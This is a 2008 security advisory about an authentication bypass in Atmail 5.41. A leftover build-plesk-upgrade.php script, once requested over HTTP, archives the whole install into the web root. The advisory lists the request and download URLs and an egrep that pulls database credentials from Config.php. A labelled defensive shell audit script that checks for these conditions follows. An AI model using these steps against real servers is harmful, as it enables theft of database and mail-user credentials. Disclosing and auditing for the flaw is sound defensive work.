SECURITYVULNS:DOC:20267
Aug 01, 2008 - 12:00 a.m.

Atmail Remote Authentication Bypass, Full DB Compromise

vulners.com

@Mail PHP Version 5.41 patch Release
http://atmail.com/demo/atmailphpdemo.tgz

The default install of Atmail 5.41 leaves the following file in the atmail/
directory: build-plesk-upgrade.php

If that file is requested over HTTP, for example http://example.com/atmail/build-plesk-upgrade.php,
it executes on the local server as the web server user (here nobody), as expected:

nobody 19495 11.3 0.0 22572 8908 ? S 17:25 0:00 /usr/bin/php
/usr/local/apache/htdocs/atmail/build-plesk-upgrade.php

producing numerous warnings and errors:

building @Mail-Plesk Pro upgrade
Warning: mkdir() [function.mkdir]: Permission denied in /usr/local/apache/htdocs/atmail/build-plesk-upgrade.php on line 32
making . dir… making /usr/local/atmail-plesk-upgrade/.

and when it completes, the following files exist in the web root:

/usr/local/apache/htdocs/atmail:
-rw-r--r-- 1 nobody nobody 101754880 Jul 30 17:26 files.tar
-rw-r--r-- 1 nobody nobody 27162656 Jul 30 17:26 plesk-atmail-upgrade.tgz

Those files are an archive of the entire atmail/ directory. The plesk-atmail-upgrade.tgz
contains only the files.tar file.

Either file could then be downloaded:

http://example.com/atmail/files.tar
http://example.com/atmail/plesk-atmail-upgrade.tgz

or copied to another directory on the server and browsed there. The archived tree
includes the Atmail Config.php file, which stores the Atmail database username,
password, and database server hostname in plain text:

$ egrep 'sql_(user|host|pass)' libs/Atmail/Config.php
'sql_host' => 'localhost',
'sql_pass' => '43s2H4N55X',
'sql_user' => 'atmail',

This information could then be used to access the Atmail database to obtain client credentials,
such as email addresses, usernames, passwords, session IDs, and more.

Also in the files.tar file is the webadmin/.htpasswd file, which contains the administrator
user's username and password hash.
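An added audit helper, not from the advisory or from Atmail, that a host administrator can run against an Atmail install directory to find the conditions described above: the leftover build-plesk-upgrade.php, any files.tar or plesk-atmail-upgrade.tgz the build script wrote into the web root, and a libs/Atmail/Config.php that every local user can read. The function name, the exit-code convention (non-zero when anything is found) and the Config.php permission check (which the advisory itself does not discuss) are assumptions; the file names and paths are the advisory's.

```shell
#!/bin/sh
# audit_atmail_dir DIR
#   Prints one line per finding and returns 1 if anything was found, 0 otherwise.
#   Hypothetical helper written for this page; not part of Atmail.
audit_atmail_dir() {
    _dir="$1"
    _found=0

    # 1. The upgrade build script must not remain inside the web root: any
    #    HTTP request to it runs it as the web server user.
    if [ -f "$_dir/build-plesk-upgrade.php" ]; then
        echo "LEFTOVER BUILD SCRIPT: $_dir/build-plesk-upgrade.php (delete it or deny it in the web server)"
        _found=1
    fi

    # 2. Archives the build script writes next to itself; both hold the whole
    #    atmail/ tree, including Config.php and webadmin/.htpasswd.
    for _f in files.tar plesk-atmail-upgrade.tgz; do
        if [ -e "$_dir/$_f" ]; then
            echo "EXPOSED ARCHIVE: $_dir/$_f (downloadable copy of the install, remove it)"
            _found=1
        fi
    done

    # 3. General hardening check (assumption, not from the advisory): the file
    #    holding sql_user/sql_pass should not be readable by every local account.
    #    GNU stat first, BSD/macOS stat as fallback; either yields an octal mode.
    _cfg="$_dir/libs/Atmail/Config.php"
    if [ -f "$_cfg" ]; then
        _mode=$(stat -c '%a' "$_cfg" 2>/dev/null || stat -f '%Lp' "$_cfg")
        case "$_mode" in
            *[4567])
                echo "WORLD-READABLE CONFIG: $_cfg (mode $_mode, contains DB credentials)"
                _found=1
                ;;
        esac
    fi

    return $_found
}

# Stand-alone use: sh audit.sh /usr/local/apache/htdocs/atmail
if [ "$#" -eq 1 ]; then
    audit_atmail_dir "$1"
fi
```

Run it from cron or a configuration-management check after every upgrade; a non-zero exit is the signal to remove the build script and archives and to restrict Config.php to the web server user.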